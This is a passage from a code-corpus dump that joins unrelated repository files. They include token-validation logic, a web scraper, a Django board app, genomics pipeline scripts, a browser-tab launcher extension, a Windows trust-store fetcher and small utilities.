if not all(inp[2] == 'MINT' for inp in inputs_info):
raise RuntimeError('non-MINT inputs should have been pruned!', inputs_info)
if len(inputs_info) == 0:
return (False, 3) # no baton? invalid.
if any(inp[1] == 1 for inp in inputs_info):
# Why we use 'any' here:
# multiple 'valid' baton inputs are possible with double spending.
# technically 'valid' though miners will never confirm.
return (True, 1)
if all(inp[1] in [2,3,4] for inp in inputs_info):
return (False, 3)
return None
else:
# TRAN --- myinfo is an integer sum(outs)
# Check whether from the unknown + valid inputs there could be enough to satisfy outputs.
insum_all = sum(inp[2] for inp in inputs_info if inp[1] <= 1)
if insum_all < myinfo:
return (False, 3)
# Check whether the known valid inputs provide enough tokens to satisfy outputs:
insum_valid = sum(inp[2] for inp in inputs_info if inp[1] == 1)
if insum_valid >= myinfo:
return (True, 1)
return None
``` |
{
"source": "1cybersheep1/scrapie",
"score": 2
} |
#### File: scrapie/scrapie/feature.py
```python
class Feature:
def __init__(self, name, selector, data_type, number_of_values, patterns):
self.name = name
self.selector = selector
self.pattern = patterns[data_type]
self.multiple_values = number_of_values != 'single'
```
#### File: scrapie/scrapie/page.py
```python
import re
import requests
from bs4 import BeautifulSoup
def get_page_content(url, timeout=5):
    try:
        # Make the request
        response = requests.get(url, stream=True, timeout=timeout)
    # If the request timed out, report that specifically
    except requests.Timeout:
        raise Exception('Timeout')
    except requests.RequestException:
        raise Exception('Error')
    # Check status code (raised outside the try so it is not swallowed above)
    if response.status_code != 200:
        raise Exception(response.status_code)
    return BeautifulSoup(response.content, "html.parser")
def extract_features(page_content, features):
    extracted_features = []
    for feature in features:
        tag_content = page_content.select(feature.selector)
        text = tag_content[0].text if tag_content else ''
        values = re.findall(feature.pattern, text)
        if feature.multiple_values:
            extracted_features.append(', '.join(values))
        else:
            # Guard against a missing match instead of raising IndexError
            extracted_features.append(values[0] if values else '')
    return extracted_features
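
# Usage sketch (assumption): wiring Feature and the page helpers together. The
# import path, URL, selector and patterns dict below are made up for
# illustration.
if __name__ == '__main__':
    from scrapie.feature import Feature
    patterns = {'text': r'.+'}
    title = Feature('title', 'h1', 'text', 'single', patterns)
    page = get_page_content('https://example.com')
    print(extract_features(page, [title]))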
``` |
{
"source": "1d20/uz-api",
"score": 3
} |
#### File: uz-api/uz_api/client.py
```python
from uz_api import mock_data
from itertools import chain
from uz_api.models import Station, Train, Coach
from uz_api.serializers import Serializer
from uz_api.booking import BookingClient
class ClientInterface:
def __init__(self, language='en'):
self.client = BookingClient()
def stations(self, name):
stations = [Station.from_dict(station) for station in self.client.get_stations(name)]
return stations
def trains(self, station_from_id, station_to_id, date_dep, time_dep="00:00", time_dep_till=None,
another_ec=0, search=''):
"""
date_dep format: mm.dd.yyyy
"""
trains = [Train.from_dict(train) for train in mock_data.TRAINS['value']]
return trains
def coaches(self, station_from_id, station_to_id, date_dep, train, model, coach_type, round_trip=0, another_ec=0):
"""
date_dep: 1463224100
coach_type: С2
model: 3
train: 043
"""
coaches = [Coach.from_dict(train) for train in mock_data.COACHES['coaches']]
return coaches
def seats(self, station_from_id, station_to_id, date_dep, train, coach_num,
coach_class, coach_type_id, change_scheme):
return set(chain(*mock_data.COACH['value']['places'].values()))
if __name__ == '__main__':
    client = ClientInterface()
print(client.stations('Ky'))
print(client.stations('Lv'))
# print(Serializer.serialize(client.stations('Ky')))
#
# print(client.trains(100, 42, '01.01.2000'))
# print(Serializer.serialize(client.trains(100, 42, '01.01.2000')))
#
# print(client.coaches(100, 42, 1463224100, '043', 3, 'C2'))
# print(Serializer.serialize(client.coaches(100, 42, 1463224100, '043', 3, 'C2')))
#
# print(client.seats(100, 42, 1463224100, '043', 1, 2, 19, 1))
``` |
{
"source": "1danielcoelho/SegmentationOptimizer",
"score": 3
} |
#### File: 1danielcoelho/SegmentationOptimizer/timeit_context.py
```python
from contextlib import contextmanager
import time
@contextmanager
def timeit_context(name):
"""
Use it to time a specific code snippet
Usage: 'with timeit_context('Testcase1'):'
:param name: Name of the context
"""
start_time = time.time()
yield
elapsed_time = time.time() - start_time
print('[{}] finished in {} ms'.format(name, int(elapsed_time * 1000)))
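
# Minimal demo (not part of the original module):
if __name__ == '__main__':
    with timeit_context('sleep demo'):
        time.sleep(0.25)  # expected output: [sleep demo] finished in ~250 ms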
``` |
{
"source": "1danielcoelho/system-viewer",
"score": 2
} |
#### File: system-viewer/scripts/add_material_info.py
```python
from constants import *
from math import sin, cos, sqrt, atan2
from database_utils import save_database, load_database
materials = {
'199': 'rocky',
'299': 'atmo',
'399': 'earth',
'499': 'atmo',
'599': 'gas',
'699': 'gas',
'799': 'gas',
'899': 'gas',
'999': 'rocky',
}
material_parameters = {
'10': {
'base_color': 'FF9900FF',
'emissive_texture': '2k_sun.jpg',
'emissive_factor': '[1.0, 1.0, 1.0]',
},
'199': {
'base_color': '726658FF',
'base_color_texture': '2k_mercury.jpg'
},
'299': {
'base_color': 'EFECDDFF',
'base_color_texture': '2k_venus_atmosphere.jpg'
},
'301': {
'base_color': 'CFCFD1FF',
'base_color_texture': '2k_moon.jpg',
},
'399': {
'base_color': 'A49FB3FF',
'base_color_texture': '2k_earth_daymap.jpg',
'night_color_texture': '2k_earth_nightmap.jpg',
'normal_texture': '2k_earth_normal_map.png',
'metal_rough_texture': '2k_earth_metal_rough.png',
'clouds_texture': '2k_earth_clouds.jpg',
},
'499': {
'base_color': '896545FF',
'base_color_texture': '2k_mars.jpg'
},
'599': {
'base_color': 'C3BEABFF',
'base_color_texture': '2k_jupiter.jpg'
},
'699': {
'base_color': 'C9B38EFF',
'base_color_texture': '2k_saturn.jpg'
},
'799': {
'base_color': 'AED5DAFF',
'base_color_texture': '2k_uranus.jpg'
},
'899': {
'base_color': '91AFBAFF',
'base_color_texture': '2k_neptune.jpg'
},
'999': {
'base_color': 'C09F82FF',
},
}
# Hard-coded sun intensity in candela:
# https://what-if.xkcd.com/151/
light_intensities = {
'10': 3.024E27,
}
def add_light_info(database):
count = 0
for db_name, db in database.items():
if db_name in ['state_vectors', 'osc_elements']:
continue
for body_id, intensity in light_intensities.items():
try:
db[body_id]['brightness'] = intensity
print(f"added {intensity} as intensity to body {body_id}")
count += 1
except KeyError:
continue
return count
def add_material_info(database):
count = 0
for db_name, db in database.items():
if db_name in ['state_vectors', 'osc_elements']:
continue
for body_id, body in db.items():
# Material choice
            set_mat = False
            try:
                mat = materials[body_id]
                body['material'] = mat
                set_mat = True
            except KeyError:
                pass
# Material parameters
set_params = False
try:
params = material_parameters[body_id]
if 'material_params' not in body:
body['material_params'] = {}
body['material_params'].update(params)
set_params = True
except KeyError:
pass
if set_mat or set_params:
count += 1
return count
def run(database):
print("Adding material info to database bodies...")
count = add_material_info(database)
print(f"Added material info to {count} database bodies")
print("Adding light info to database bodies...")
count = add_light_info(database)
print(f"Added light info to {count} database bodies")
if __name__ == "__main__":
database = load_database()
run(database)
save_database(database)
```
#### File: system-viewer/scripts/database_utils.py
```python
import os
import sys
import json
import copy
import re
database_folder = "E:/Rust/system_viewer/public/database"
files = [
"asteroids",
"comets",
"jovian_satellites",
"saturnian_satellites",
"other_satellites",
"major_bodies",
"artificial",
"state_vectors",
"osc_elements",
]
def load_database():
""" Read existing files and load into maps """
database = {}
for file in files:
database[file] = {}
path = os.path.join(database_folder, file + ".json")
if os.path.exists(path):
with open(path, "r") as f:
database[file] = json.load(f)
return database
def get_body_by_name(database, name):
for base_name, base in database.items():
if base_name in ['state_vectors', 'osc_elements']:
continue
for body in base.values():
if body['name'] == name:
return body
return None
def save_database(database):
""" Write database back to their individual files """
# Sort all databases
for db_name in database.keys():
        database[db_name] = {k: v for k, v in sorted(database[db_name].items(), key=lambda item: item[0])}
# Write database to files
for filename in database:
path = os.path.join(database_folder, filename + ".json")
with open(path, "w") as f:
json.dump(database[filename], f)
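if __name__ == "__main__":
    # Minimal round-trip sketch (assumption: database_folder above exists and
    # holds at least one of the JSON files listed in `files`; "Earth" is an
    # illustrative body name):
    db = load_database()
    body = get_body_by_name(db, "Earth")
    print(body["name"] if body else "Earth not found")
    save_database(db)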
``` |
{
"source": "1davidmichael/iam_generator",
"score": 2
} |
#### File: iam_generator/src/html.py
```python
from fastapi import FastAPI, Request, Form
from fastapi.templating import Jinja2Templates
from src.model import generate_iam_policy
app = FastAPI()
templates = Jinja2Templates(directory="templates/")
@app.get("/")
def form_post(request: Request):
result = "Type a ARN"
return templates.TemplateResponse('form.html', context={'request': request, 'result': result})
@app.post("/")
def form_post(request: Request, arn: str = Form(...), type: str = Form(...)):
result = generate_iam_policy(arn, type)
return templates.TemplateResponse('form.html', context={'request': request, 'result': result})
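# To serve this app locally (assumption: uvicorn is installed):
#   uvicorn src.html:app --reload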
``` |
{
"source": "1davidmichael/lambda-uncompressed-size-reviewer",
"score": 2
} |
#### File: 1davidmichael/lambda-uncompressed-size-reviewer/total_lambda_size.py
```python
import boto3
import botostubs
import glob
import os
import requests
import sys
import shutil
import tempfile
import zipfile
from hurry.filesize import size
def get_size_total(temp_dir):
zip_files = glob.glob(os.path.join(temp_dir, "*.zip"))
all_size = 0
    for zip_path in zip_files:
        total_size = 0
        zip_file = zipfile.ZipFile(zip_path)
        for file in zip_file.namelist():
            total_size += zip_file.getinfo(name=file).file_size
        all_size += total_size
        human_size = size(total_size)
        print(f"{ zip_path }: { human_size }")
print(f"Total: { size(all_size) }")
def main(lambda_name):
temp_dir = tempfile.mkdtemp()
client = boto3.client("lambda", region_name="us-east-1") # type: botostubs.LAMBDA
lambda_info = client.get_function(
FunctionName=lambda_name
)
response = requests.get(lambda_info["Code"]["Location"])
with open(os.path.join(temp_dir, f"{ lambda_name }.zip"), "wb") as f:
f.write(response.content)
    for layer in lambda_info["Configuration"].get("Layers", []):
layer_arn = layer["Arn"].split(":")
layer_name = layer_arn[6]
layer_version = layer_arn[7]
layer_info = client.get_layer_version(
LayerName=layer_name,
VersionNumber=int(layer_version)
)
response = requests.get(layer_info["Content"]["Location"])
with open(os.path.join(temp_dir, f"{ layer_name }.zip"), "wb") as f:
f.write(response.content)
get_size_total(temp_dir)
shutil.rmtree(temp_dir)
if __name__ == "__main__":
lambda_name = sys.argv[1]
main(lambda_name=lambda_name)
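# Usage (assumption: AWS credentials for us-east-1 are configured;
# "my-function-name" is an illustrative function name):
#   python total_lambda_size.py my-function-name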
``` |
{
"source": "1dayac/LRSIM",
"score": 3
} |
#### File: scripts/galaxy/dwgsim_eval_wrapper.py
```python
import optparse, os, shutil, subprocess, sys, tempfile
def stop_err( msg ):
sys.stderr.write( '%s\n' % msg )
sys.exit()
def run_process ( cmd, name, tmp_dir, buffsize ):
try:
tmp = tempfile.NamedTemporaryFile( dir=tmp_dir ).name
tmp_stderr = open( tmp, 'wb' )
proc = subprocess.Popen( args=cmd, shell=True, cwd=tmp_dir, stderr=tmp_stderr.fileno() )
returncode = proc.wait()
tmp_stderr.close()
# get stderr, allowing for case where it's very large
        tmp_stderr = open( tmp, 'r' )
        stderr = ''
        try:
            while True:
                chunk = tmp_stderr.read( buffsize )
                if not chunk:
                    break
                stderr += chunk
        except OverflowError:
            pass
        tmp_stderr.close()
        if returncode != 0:
            raise Exception( stderr )
    except Exception as e:
        raise Exception( 'Error in \'' + name + '\'. \n' + str( e ) )
def check_output ( output, canBeEmpty ):
if 0 < os.path.getsize( output ):
return True
elif False == canBeEmpty:
        raise Exception( 'The output file is empty: ' + output )
def __main__():
#Parse Command Line
parser = optparse.OptionParser()
parser.add_option( '-a', '--alignmentScore', action='store_true', dest='alignmentScore', default=False, help='split alignments by alignment score instead of mapping quality' )
parser.add_option( '-b', '--bwa', action='store_true', dest='bwa', default=False, help='alignments are from BWA (SOLiD only)' )
parser.add_option( '-c', '--colorSpace', action='store_true', dest='colorSpace', default=False, help='generate reads in color space (SOLiD reads)' )
parser.add_option( '-d', '--scoreFactor', dest='scoreFactor', type='int', help='divide quality/alignment score by this factor' )
parser.add_option( '-g', '--wiggle', dest='wiggle', type='int', help='gap "wiggle"' )
parser.add_option( '-n', '--numReads', dest='numReads', type='int', help='number of raw input paired-end reads (otherwise, inferred from all SAM records present).' )
parser.add_option( '-q', '--minMapq', dest='minMapq', type='int', help='consider only alignments with this mapping quality or greater.' )
parser.add_option( '-z', '--singleEnd', action='store_true', dest='singleEnd', default=False, help='input contains only single end reads' )
parser.add_option( '-S', '--sam', dest='sam', default=None, help='input SAM' )
parser.add_option( '-B', '--bam', dest='bam', default=None, help='input BAM' )
parser.add_option( '-p', '--printIncorrect', action='store_true', dest='printIncorrect', default=False, help='print incorrect alignments' )
parser.add_option( '-s', '--numSnps', dest='numSnps', type="int", help='consider only alignments with the number of specified SNPs' )
    parser.add_option( '-e', '--numErrors', dest='numErrors', type="int", default=None, help='consider only alignments with the number of specified errors' )
parser.add_option( '-i', '--indels', action='store_true', dest='indels', default=False, help='consider only alignments with indels' )
parser.add_option( '-o', '--output', dest='output', help='The file to save the output' )
(options, args) = parser.parse_args()
# output version # of tool
try:
tmp = tempfile.NamedTemporaryFile().name
        tmp_stdout = open( tmp, 'w' )
proc = subprocess.Popen( args='dwgsim_eval 2>&1', shell=True, stdout=tmp_stdout )
tmp_stdout.close()
returncode = proc.wait()
stdout = None
        for line in open( tmp_stdout.name, 'r' ):
if line.lower().find( 'version' ) >= 0:
stdout = line.strip()
break
if stdout:
sys.stdout.write( '%s\n' % stdout )
else:
raise Exception
except:
sys.stdout.write( 'Could not determine DWGSIM_EVAL version\n' )
buffsize = 1048576
# make temp directory for dwgsim, requires trailing slash
tmp_dir = '%s/' % tempfile.mkdtemp()
#'generic' options used in all dwgsim commands here
try:
tmp_dir = '%s/' % tempfile.mkdtemp()
dwgsim_eval_cmd = 'dwgsim_eval'
if True == options.alignmentScore:
dwgsim_eval_cmd = dwgsim_eval_cmd + ' -a'
if True == options.bwa:
dwgsim_eval_cmd = dwgsim_eval_cmd + ' -b'
if True == options.colorSpace:
dwgsim_eval_cmd = dwgsim_eval_cmd + ' -c'
use_p = False
        if options.numSnps is not None and 0 <= options.numSnps:
use_p = True
dwgsim_eval_cmd = dwgsim_eval_cmd + (' -s %s' % options.numSnps)
        if options.numErrors is not None and 0 <= options.numErrors:
use_p = True
dwgsim_eval_cmd = dwgsim_eval_cmd + (' -e %s' % options.numErrors)
if True == options.indels:
use_p = True
dwgsim_eval_cmd = dwgsim_eval_cmd + ' -i'
if True == use_p or True == options.printIncorrect:
dwgsim_eval_cmd = dwgsim_eval_cmd + ' -p'
if True == options.singleEnd:
dwgsim_eval_cmd = dwgsim_eval_cmd + ' -z'
dwgsim_eval_cmd = '%s -d %s -g %s -n %s -q %s' % (dwgsim_eval_cmd, \
options.scoreFactor, \
options.wiggle, \
options.numReads, \
options.minMapq)
if None != options.sam:
dwgsim_eval_cmd = dwgsim_eval_cmd + ' -S ' + options.sam
elif None != options.bam:
dwgsim_eval_cmd = dwgsim_eval_cmd + ' ' + options.bam
else:
            raise Exception( 'Input file was neither a SAM nor BAM' )
dwgsim_eval_cmd = dwgsim_eval_cmd + ' > ' + options.output
# need to nest try-except in try-finally to handle 2.4
try:
# dwgsim
run_process ( dwgsim_eval_cmd, 'dwgsim', tmp_dir, buffsize )
# check that there are results in the output file
check_output ( options.output, False )
sys.stdout.write( 'DWGSIM_EVAL successful' )
        except Exception as e:
stop_err( 'DWGSIM_EVAL failed.\n' + str( e ) )
finally:
# clean up temp dir
if os.path.exists( tmp_dir ):
shutil.rmtree( tmp_dir )
if __name__=="__main__": __main__()
``` |
{
"source": "1dayac/novel_insertions",
"score": 2
} |
#### File: 1dayac/novel_insertions/novel-x.py
```python
import click
from click_option_group import optgroup, MutuallyExclusiveOptionGroup
import pysam
import json
from os import mkdir, path, symlink, chdir
from shutil import copy2
from subprocess import call, Popen
def get_read_group(bam):
readgroup = ""
bamfile = pysam.AlignmentFile(bam, "rb")
for read in bamfile.fetch(until_eof=True):
try:
readgroup = read.get_tag('RG')
break
except:
pass
bamfile.close()
return readgroup.replace(":", "_")[:-2]
def create_config(bam, genome, nt, outdir, lr20, m, t, highcoverage, lowcoverage, tenx):
data = {}
data['genome'] = path.abspath(genome)
data['additional_flags'] = "--lr20" if lr20 else ""
data['blast_db'] = nt + "/nt" if nt != "" else "None"
data['root'] = path.dirname(path.realpath(__file__))
data['sample'] = path.basename(bam)[:-4]
data['outdir'] = outdir
data['threads'] = int(t)
data['memory'] = int(m)
data['memory_per_thread'] = int(m/(2*t)) + 1
data['velvet_coverage'] = 8 if highcoverage else 2
data['velvet_k_assembly'] = 63 if tenx else 49
data['spades_k_assembly'] = 77 if tenx else 49
data['tenx'] = "10X" if tenx else "other"
with open(outdir + "/config.json", 'w') as configfile:
json.dump(data, configfile, sort_keys=True, indent=4)
@click.group()
def main():
pass
@main.command()
@click.option('--outdir', nargs = 1, required = True)
def restart(outdir):
"""Restart unfinished 10X-pipeline for novel insertion detection."""
chdir(outdir)
process = Popen(['snakemake', '--unlock', '--cores', 'all'])
process.wait()
process = Popen(['snakemake', '--cores', 'all'])
process.wait()
@main.command()
@click.option('--bam', help = "Input BAM file", required = True)
@click.option('--genome', help = "Genome file in fasta or fasta.gz format", required = True)
@click.option('--nt', default = "", nargs = 1, help = 'Folder containing NT database. '
'If not provided filtering of non-human sequences is not performed')
@click.option('--outdir', nargs = 1, required = True)
@click.option('--lr20', default=False, is_flag = True, help = 'If your BAM-file was produced by LongRanger 2.0 you should provide '
'this option to avoid failures')
@click.option('-m', default = 100, nargs = 1, help = 'Available memory specified in gigabytes')
@click.option('-t', default = 8, nargs = 1, help = 'Number of threads')
@optgroup.group('Coverage option group', cls=MutuallyExclusiveOptionGroup)
@optgroup.option('--high-coverage', 'highcoverage', is_flag=True, default=True, help = "Flag for high-coverage data (60X or higher, default)")
@optgroup.option('--low-coverage', 'lowcoverage', is_flag = True, default = False, help = "Flag for low-coverage data (20-40X)")
@optgroup.group('Data type option group', cls=MutuallyExclusiveOptionGroup)
@optgroup.option('--10x', 'tenx', is_flag=True, default=True, help = "Default")
@optgroup.option('--stlfr', is_flag = True, default = False)
@optgroup.option('--tellseq', is_flag = True, default = False)
def run(bam, genome, nt, outdir, lr20, m, t, highcoverage, lowcoverage, tenx, stlfr, tellseq):
"""Run 10X-pipeline for novel insertion detection."""
try:
mkdir(outdir)
    except OSError:
print("Output folder can't be created. Probably it already exists")
return -1
if stlfr or tellseq:
tenx = False
if lowcoverage:
highcoverage = False
create_config(bam, genome, nt, outdir, lr20, m, t, highcoverage, lowcoverage, tenx)
copy2(path.dirname(path.realpath(__file__)) + "/path_to_executables_config.json", outdir)
copy2(path.dirname(path.realpath(__file__)) + "/Snakefile", outdir)
mkdir(outdir + "/sample")
symlink(path.abspath(bam), outdir + "/sample/" + path.basename(bam))
chdir(outdir)
process = Popen(['snakemake', '--cores', str(t)])
process.wait()
if __name__ == '__main__':
main()
```
#### File: 1dayac/novel_insertions/remove_contaminations.py
```python
import sys
import re
class Usage(Exception):
def __init__(self, msg):
self.msg = msg
def usage():
print("\nUsage: python extractContaminants.py contaminationFile orphan.fq.contigs.fa orphan.fq.contigs.wocontamination.fa")
sys.exit(-1)
def main():
args = sys.argv[1:]
if len(args) != 3:
usage()
fcontamination = open(sys.argv[1], 'r')
fcontig = open(sys.argv[2], 'r')
fout = open(sys.argv[3], 'w')
contamination = fcontamination.readline()
while contamination != '':
contamination = contamination.split()[0]
contig = fcontig.readline()[:-1]
if (contig != ''):
contig = re.split(">| ", contig)[1]
while contamination != contig and contig != '':
fout.write(">" + contig + "\n")
while True:
temp_string = fcontig.readline()
if temp_string != '' and temp_string[0] != '>':
fout.write(temp_string)
else:
break
contig = temp_string
if (contig != ''):
contig = re.split(">| ", contig)[1][:-1]
if (contamination == contig and contig != ''):
last_pos = fcontig.tell()
fcontig.readline()
while contig != '':
if contig[0] == '>':
fcontig.seek(last_pos)
break
last_pos = fcontig.tell()
contig = fcontig.readline()
contamination = fcontamination.readline()
contig = fcontig.readline()
while contig != '':
fout.write(contig)
fout.write(fcontig.readline())
contig = fcontig.readline()
fout.close()
if __name__ == "__main__":
sys.exit(main())
``` |
{
"source": "1debit/infosec-trust-stores-observatory",
"score": 3
} |
#### File: trust_stores_observatory/store_fetcher/microsoft_fetcher.py
```python
from datetime import datetime
from typing import Tuple, List
from urllib.request import urlopen
from cryptography.hazmat.primitives import hashes
from trust_stores_observatory.certificates_repository import RootCertificatesRepository
from trust_stores_observatory.store_fetcher.root_records_validator import RootRecordsValidator
from trust_stores_observatory.store_fetcher.scraped_root_record import ScrapedRootCertificateRecord
from trust_stores_observatory.store_fetcher.store_fetcher_interface import StoreFetcherInterface
from trust_stores_observatory.trust_store import TrustStore, PlatformEnum
class MicrosoftTrustStoreFetcher(StoreFetcherInterface):
"""Fetch the content of the MSFT / Windows trust store.
This fetcher uses the newly-available CCADB described at
https://docs.microsoft.com/en-us/security/trusted-root/participants-list.
"""
_CSV_URL = "https://ccadb-public.secure.force.com/microsoft/IncludedCACertificateReportForMSFTCSV"
_PAGE_URL = "https://ccadb-public.secure.force.com/microsoft/IncludedCACertificateReportForMSFT"
def fetch(self, certs_repo: RootCertificatesRepository, should_update_repo: bool = True) -> TrustStore:
with urlopen(self._CSV_URL) as response:
csv_content = response.read().decode("utf-8")
# Extract the data from the CSV
scraped_trusted_root_records, scraped_blocked_root_records = self._parse_spreadsheet(csv_content)
# Look for each parsed certificate in the supplied certs repo
trusted_root_records = RootRecordsValidator.validate_with_repository(certs_repo, scraped_trusted_root_records)
blocked_root_records = RootRecordsValidator.validate_with_repository(certs_repo, scraped_blocked_root_records)
date_fetched = datetime.utcnow().date()
return TrustStore(
PlatformEnum.MICROSOFT_WINDOWS,
None,
self._PAGE_URL,
date_fetched,
trusted_root_records,
blocked_root_records,
)
@staticmethod
def _parse_spreadsheet(
csv_content: str
) -> Tuple[List[ScrapedRootCertificateRecord], List[ScrapedRootCertificateRecord]]:
# Iterate over each row in the work sheet
parsed_trusted_root_records = []
parsed_blocked_root_records = []
for csv_row in csv_content.splitlines()[1::]:
split_row = csv_row.split('","')
subject_name = split_row[1].strip()
            if not subject_name:
# Most likely indicates the end of the data
continue
is_cert_trusted = False
status = split_row[9].strip()
if "Included" in status:
# Some certs are disabled or have a notBefore constraint
is_cert_trusted = True
sha256_fingerprint = split_row[3].strip()
fingerprint = bytes(bytearray.fromhex(sha256_fingerprint))
record = ScrapedRootCertificateRecord(subject_name, fingerprint, hashes.SHA256())
if is_cert_trusted:
parsed_trusted_root_records.append(record)
else:
parsed_blocked_root_records.append(record)
return parsed_trusted_root_records, parsed_blocked_root_records
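# Illustrative use (assumption: a populated RootCertificatesRepository named
# certs_repo is available):
#   store = MicrosoftTrustStoreFetcher().fetch(certs_repo, should_update_repo=False)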
``` |
{
"source": "1dom/ulauncher-brotab",
"score": 2
} |
#### File: ulauncher-brotab/brotab_ulauncher/client.py
```python
import subprocess
import logging
from brotab_ulauncher.brotab import return_clients, return_tabs, activate_tab, close_tab
from asyncio import new_event_loop, set_event_loop
from memoization import cached
logger = logging.getLogger(__name__)
class BrotabClient:
""" Client to interact with Brotab Command line tool """
clients = {}
def __init__(self):
""" Constructor method """
pass
@cached(ttl=15)
def is_installed(self):
""" Checks if Brotab is installed """
        result = subprocess.run(['which', 'brotab'])
        return result.returncode == 0
def index_clients(self):
""" Index the clients connected """
self.clients = {}
clients = return_clients()
for client in clients:
self.clients[client.__dict__["_prefix"].replace(".", "")] = client.__dict__["_browser"]
@cached(ttl=5)
def fetch_tabs(self):
""" Index Tabs list """
logger.info("Fetching tabs")
self.index_clients()
loop = new_event_loop()
set_event_loop(loop)
tabs_listed = return_tabs()
tabs = []
for tab in tabs_listed:
tab = tab.split("\t")
tabs.append({
"prefix": tab[0],
"name": tab[1],
"url": tab[2],
"icon": self.get_browser_icon_from_prefix(tab[0][:1])
})
return tabs
def search_tabs(self, filter_term=None):
""" Returns a list of tabs, optionally filtered by the filter_query parameter """
        all_tabs = self.fetch_tabs()
        if not filter_term:
            return all_tabs
        tabs = []
        for tab in all_tabs:
if filter_term.lower() in tab["name"].lower() or filter_term.lower() in tab["url"].lower():
tabs.append(tab)
return tabs
def activate_tab(self, prefix):
""" Activates the tab with the specified prefix """
activate_tab(prefix)
def close_tab(self, prefix):
""" Closes the tab with the specified prefix """
close_tab(prefix)
def get_browser_icon_from_prefix(self, prefix):
""" Returns the name of the icon to display as client """
if prefix not in self.clients.keys():
return 'icon.png'
client = self.clients.get(prefix)
if "chrome" in client:
return 'icon-chrome.png'
if "firefox" in client:
return "icon-firefox.png"
if "brave" in client:
return "icon-brave.png"
return "icon.png"
```
#### File: ulauncher-brotab/brotab_ulauncher/listeners.py
```python
from ulauncher.api.client.EventListener import EventListener
class KeywordQueryEventListener(EventListener):
""" Listener that handles the user input """
def on_event(self, event, extension):
""" Handles the event """
keyword = event.get_keyword() or ""
valid_keywords = ["cltab", "cl", "clt"]
if keyword in valid_keywords:
extension.mode = "killer"
else:
extension.mode = "activator"
return extension.search_tabs(event)
class ItemEnterEventListener(EventListener):
""" Listener that handles the click on an item """
# pylint: disable=unused-argument,no-self-use
def on_event(self, event, extension):
""" Handles the event """
data = event.get_data()
if data["mode"] == "activator":
extension.brotab_client.activate_tab(data["tab"])
if data["mode"] == "killer":
try:
extension.brotab_client.close_tab(data["tab"])
except Exception as error:
extension.logger.error(error)
extension.logger.info("Tab closed")
``` |
{
"source": "1donggri/teamProject",
"score": 2
} |
#### File: teamProject/board/forms.py
```python
from django.contrib.auth.hashers import check_password
from django import forms
from .models import Board
class BoardForm(forms.Form):
class Meta:
model = Board
fields = ['name', 'title', 'file']
    # fields to receive as input
name = forms.CharField(error_messages={'required': '작성자를 입력하세요.'}, max_length=100, label="작성자")
title = forms.CharField(error_messages={'required': '제목을 입력하세요.'}, max_length=100, label="제목")
file = forms.FileField(error_messages={'required': '파일을 업로드하세요.'}, label="파일")
def __init__(self, *args, **kwargs):
super(BoardForm, self).__init__(*args, **kwargs)
# self.fields['file'].required = False
```
#### File: teamProject/board/models.py
```python
from django.db import models
# Create your models here.
class Board(models.Model):
author = models.CharField(max_length=100, null=False, verbose_name="작성자")
title = models.CharField(max_length=100, null=False)
created_date = models.DateTimeField(auto_now_add=True, verbose_name="작성일")
modified_date = models.DateTimeField(auto_now=True, verbose_name="최종수정일")
file = models.FileField(null=True, upload_to="")
def __str__(self):
return self.title
class Meta:
db_table = 'boards'
verbose_name = '게시판'
verbose_name_plural = '게시판'
```
#### File: teamProject/schedule/views.py
```python
from django.shortcuts import render, redirect
from .models import Post
from .forms import ScheduleForm
from django.core.paginator import Paginator
# Create your views here.
def view_schedule(request):
all_posts = Post.objects.all().order_by('pub_date')
page = int(request.GET.get('p', 1))
    paginator = Paginator(all_posts, 5)
    posts = paginator.get_page(page)
return render(request, 'schedule/view_schedule.html', {'posts': posts})
def write_schedule(request):
if request.method == "POST":
form = ScheduleForm(request.POST)
if form.is_valid():
            # form.is_valid() calls all of the form's validators to perform validation
# user_id = request.session.get('user')
# user = User.objects.get(pk=user_id)
schedule = Post()
schedule.title = form.cleaned_data['title']
            # # values that pass validation are provided as a dict (form.cleaned_data)
            # # on validation failure, error details are stored in form.errors
schedule.username = form.cleaned_data['username']
schedule.pub_date = form.cleaned_data['pub_date']
schedule.save()
return redirect('schedule:view_schedule')
else:
form = ScheduleForm()
return render(request, 'schedule/write_schedule.html', {'form': form})
def delete(request, posts_id):
post = Post.objects.get(id=posts_id)
post.delete()
posts = Post.objects.all().order_by('-id')
return render(request, 'schedule/view_schedule.html', {'posts': posts})
``` |
{
"source": "1Doomdie1/hashlist",
"score": 4
} |
#### File: src/hashlist/hash_list.py
```python
class hash_list():
def __init__(self):
self.hash_list = {}
def add(self, *args):
if args:
for item in args:
key = self._key(item)
if self.hash_list.get(key):
self.hash_list[key].append(item)
else:
self.hash_list[key] = [item]
else:
raise TypeError('No arguments passed.')
def get_item_index(self, item):
key = self._key(item)
if self.hash_list.get(key):
items_lst = self.hash_list[key]
if item in items_lst:
return (key, items_lst.index(item))
raise LookupError(f"'{item}' may have the same key but is not in hashlist")
else:
raise LookupError(f"'{item}' not found")
def get_item_by_index(self, index):
try:
return self.hash_list[index[0]][index[1]]
except LookupError:
            raise LookupError('Index out of bounds')
def remove_item_by_index(self, index):
try:
self.hash_list[index[0]].pop(index[1])
            if not self.hash_list[index[0]]:  # remove the key once its bucket is empty
self.delete_key(index[0])
except LookupError:
            raise LookupError('Index out of bounds.')
def remove_item_by_name(self, item):
index = self.get_item_index(item)
self.remove_item_by_index(index)
def delete_key(self, key):
self.hash_list.pop(key)
def keys(self):
        return list(self.hash_list.keys())
def _key(self, word):
if word:
key = sum([ord(letter) for letter in word])//len(word)
return key
raise TypeError('Argument can not be None')
def print(self):
print(self.hash_list)
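if __name__ == '__main__':
    # Small usage sketch of the hash list:
    hl = hash_list()
    hl.add('apple', 'banana', 'pear')
    idx = hl.get_item_index('apple')       # (bucket key, position)
    print(idx, hl.get_item_by_index(idx))
    hl.remove_item_by_name('apple')
    hl.print()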
``` |
{
"source": "1Doomdie1/ivy",
"score": 3
} |
#### File: automation_tools/pr_automation/pr_action.py
```python
import sys
import json
from process_pr import Process_pr
def import_file(file_path):
with open(file_path, 'r') as file:
data = json.loads(file.read())
return data
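# Expected shape of volunteer_go_to_intern.json (illustrative):
#   { "intern_login": ["volunteer_login_1", "volunteer_login_2"], ... }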
def main():
pr = Process_pr(int(sys.argv[1]), sys.argv[2])
interns_assigned_volunteers = import_file('volunteer_go_to_intern.json')
interns = list(interns_assigned_volunteers.keys())
for ivy_intern, assigned_volunteers in interns_assigned_volunteers.items():
if pr.author() in assigned_volunteers:
pr.assign_intern(ivy_intern)
print(f'[+] {ivy_intern} was assigned to PR {pr.number()}')
sys.exit(0)
